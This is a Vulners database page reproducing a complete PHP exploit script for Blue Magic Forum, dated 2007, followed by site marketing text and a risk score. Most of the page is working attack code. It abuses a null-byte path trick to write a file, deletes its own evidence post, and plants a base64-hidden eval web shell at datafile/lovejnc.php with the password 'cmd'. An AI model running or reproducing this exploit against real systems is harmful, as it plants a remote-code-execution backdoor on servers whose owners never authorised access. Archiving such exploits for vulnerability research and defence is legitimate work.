Vulners
Lucene search
<?php
print_r("
+------------------------------------------------------------------+
Exploit For Blue Magic Forum All Version
Fuck Register Global && Magic Quote
BY 拖鞋王子 Mokfly 媒婆X
Just For Fun :)
+------------------------------------------------------------------+
");
ini_set("max_execution_time",0);
error_reporting(7);
$bbspath="$argv[2]";
$server="$argv[1]";
$cookie='AJSTAT_ok_times=2; userlanguage=gb; bmsess=0c1a833d1707645f61dfffb04e140dae; lastpath=%2Findex.php; lastvisit_fr=1168661353; AJSTAT_ok_pages=6; regvisit_fr=1168661350; bmforumerboardidnum=21516; bmforumerboardpbmfym=1dbfbc45a9e8d8a614eab64691f38dbd';
$forumid="$argv[3]";
$useragent="mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)";
$evilpath='../'.'datafile/cache/bmbcode.php'.chr(0).chr(0);
$content_type='multipart/form-data; boundary=---------------------------7d70e70250';
function send($cmd,$path)
{
global $bbspath,$server,$cookie,$count,$useragent,$debug,$evilip,$content_type;
$path=$bbspath."$path";
$message = "POST ".$path." HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Referer: http://".$server.$path."\r\n";
$message .= "Content-Type: $content_type\r\n";
$message .= "User-Agent: ".$useragent."\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "Content-length: ".strlen($cmd)."\r\n";
$message .= "Connection: Keep-Alive\r\n";
$message .= "Cookie: ".$cookie."\r\n";
$message .= "\r\n";
$message .= $cmd."\r\n";
// echo $message;
$fd = fsockopen( $server, 80 );
fputs($fd,$message);
$resp = "<pre>";
while($fd&&!feof($fd)) {
$resp .= fread($fd,1024);
}
fclose($fd);
$resp .="</pre>";
if($debug) {echo $cmd;echo $resp;}
//echo $resp;
return $resp;
}
$data=<<<www_loveshell_net
-----------------------------7d70e70250
Content-Disposition: form-data; name="articlecontent"
yumenna
-----------------------------7d70e70250
Content-Disposition: form-data; name="upload_bname"
$evilpath
-----------------------------7d70e70250
Content-Disposition: form-data; name="__EVENTARGUMENT"
Save
-----------------------------7d70e70250
Content-Disposition: form-data; name="font"
-----------------------------7d70e70250
Content-Disposition: form-data; name="articletitle"
loveshell
-----------------------------7d70e70250
Content-Disposition: form-data; name="articledes"
boring
-----------------------------7d70e70250
Content-Disposition: form-data; name="usesignature"
checkbox
-----------------------------7d70e70250
Content-Disposition: form-data; name="actioneot"
yes
-----------------------------7d70e70250
Content-Disposition: form-data; name="autourl"
yes
-----------------------------7d70e70250
Content-Disposition: form-data; name="postweiwang"
5
-----------------------------7d70e70250
Content-Disposition: form-data; name="sellmoney"
0
-----------------------------7d70e70250
Content-Disposition: form-data; name="giftmoney"
0
-----------------------------7d70e70250
Content-Disposition: form-data; name="tagsse"
-----------------------------7d70e70250
Content-Disposition: form-data; name="tags"
-----------------------------7d70e70250
Content-Disposition: form-data; name="attachdes[]"
-----------------------------7d70e70250
Content-Disposition: form-data; name="attachment[]"; filename="C:\Documents and Settings\Loveshell.MY-TOMATO\妗岄潰\he.txt"
Content-Type: text/plain
loveshell
-----------------------------7d70e70250
Content-Disposition: form-data; name="upload_num"
1
-----------------------------7d70e70250
Content-Disposition: form-data; name="_bmb:MainContent:SaveButton"
鍙?琛?
-----------------------------7d70e70250
Content-Disposition: form-data; name="step"
2
-----------------------------7d70e70250
Content-Disposition: form-data; name="type"
-----------------------------7d70e70250
Content-Disposition: form-data; name="action"
new
-----------------------------7d70e70250
Content-Disposition: form-data; name="form_name"
__bmbForm
-----------------------------7d70e70250
Content-Disposition: form-data; name="page"
-----------------------------7d70e70250
Content-Disposition: form-data; name="forumid"
$forumid
-----------------------------7d70e70250
Content-Disposition: form-data; name="article"
-----------------------------7d70e70250
Content-Disposition: form-data; name="tid"
-----------------------------7d70e70250--
www_loveshell_net;
$response=iconv("UTF-8", "gbk",send($data,'post.php'));
if(strpos($response,'成功发表一个新帖子')) echo "Make Evil Post\tOk......\n";
else die('Error');
preg_match('/topic\.php(.+)postend/i',$response,$mathces);
$posturl=$mathces[0];
$response=iconv("UTF-8", "gbk",send('',$posturl));
preg_match('/post\.php\?action\=modify(.+)(\d+)/i',$response,$mathces);
$modifyurl=$mathces[0];
$modifyurl=str_replace('&amp;','&',$modifyurl);
$data=<<<www_loveshell_net
-----------------------------7d70e70250
Content-Disposition: form-data; name="articlecontent"
yumenna
-----------------------------7d70e70250
Content-Disposition: form-data; name="__EVENTARGUMENT"
Save
-----------------------------7d70e70250
Content-Disposition: form-data; name="font"
-----------------------------7d70e70250
Content-Disposition: form-data; name="articletitle"
loveshell
-----------------------------7d70e70250
Content-Disposition: form-data; name="articledes"
-----------------------------7d70e70250
Content-Disposition: form-data; name="usesignature"
checkbox
-----------------------------7d70e70250
Content-Disposition: form-data; name="actioneot"
yes
-----------------------------7d70e70250
Content-Disposition: form-data; name="autourl"
yes
-----------------------------7d70e70250
Content-Disposition: form-data; name="postweiwang"
5
-----------------------------7d70e70250
Content-Disposition: form-data; name="sellmoney"
0
-----------------------------7d70e70250
Content-Disposition: form-data; name="giftmoney"
0
-----------------------------7d70e70250
Content-Disposition: form-data; name="tagsse"
-----------------------------7d70e70250
Content-Disposition: form-data; name="tags"
-----------------------------7d70e70250
Content-Disposition: form-data; name="delactupload[a0]"
checkbox
-----------------------------7d70e70250
Content-Disposition: form-data; name="attachdes[]"
-----------------------------7d70e70250
Content-Disposition: form-data; name="attachment[]"; filename=""
Content-Type: application/octet-stream
-----------------------------7d70e70250
Content-Disposition: form-data; name="upload_num"
1
-----------------------------7d70e70250
Content-Disposition: form-data; name="_bmb:MainContent:SaveButton"
鍙?琛?
-----------------------------7d70e70250
Content-Disposition: form-data; name="step"
2
-----------------------------7d70e70250
Content-Disposition: form-data; name="type"
-----------------------------7d70e70250
Content-Disposition: form-data; name="action"
modify
-----------------------------7d70e70250
Content-Disposition: form-data; name="form_name"
__bmbForm
-----------------------------7d70e70250
www_loveshell_net;
$response=iconv("UTF-8", "gbk",send($data,$modifyurl));
if(strpos($response,'编辑帖子成功')) echo "Make Evil modify\tOK......\r\n";
else die('Make Evil modify Faild......');
$content_type='application/x-www-form-urlencoded';
parse_str($modifyurl, $temp);
//print_r($temp);
$delurl="misc.php?p=manage&action=del&forumid=$temp[forumid]&filename=$temp[filename]";
$response=iconv("UTF-8", "gbk",send($data,$delurl));
preg_match('/verify\'\ value=\'(.+)\'/i',$response,$mathces);
$verify=$mathces[1];
if($verify) {
$delurl="misc.php?p=manage";
$data="reasonselection=%E6%81%B6%E6%84%8F%E7%81%8C%E6%B0%B4%0D&actionreason=%E6%81%B6%E6%84%8F%E7%81%8C%E6%B0%B4&action=del&filename=$temp[filename]&forumid=$temp[forumid]&step=2&verify=$verify";
$response=iconv("UTF-8", "gbk",send($data,$delurl));
if(strpos($response,'执行成功')) echo "Del the Hence\t OK ......\r\n" ;
}
else echo "Del the Hence Failed...\r\n";
$data='tcode_count=3&tcode_item[1][enable]=1&tcode_item[1][refrom]=Ly9pZQ==&tcode_item[1][reto]=ZnB1dHMoZm9wZW4oJ2RhdGFmaWxlL2xvdmVqbmMucGhwJywndysnKSwnPD9AZXZhbCgkX1BPU1RbY21kXSk/PicpOw==';
$evilurl='bmbcode.php';
$response=iconv("UTF-8", "gbk",send($data,$evilurl));
$response=send($data,'datafile/lovejnc.php');
if(preg_match('/HTTP\/1.(\d+) 200/i',$response)) echo "Got It datafile/lovejnc.php,Password=cmd :)\r\n";
else die("Maybe Something Wrong :( \r\n");
?>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Jan 2007 00:00Current
7.1High risk
Vulners AI Score7.1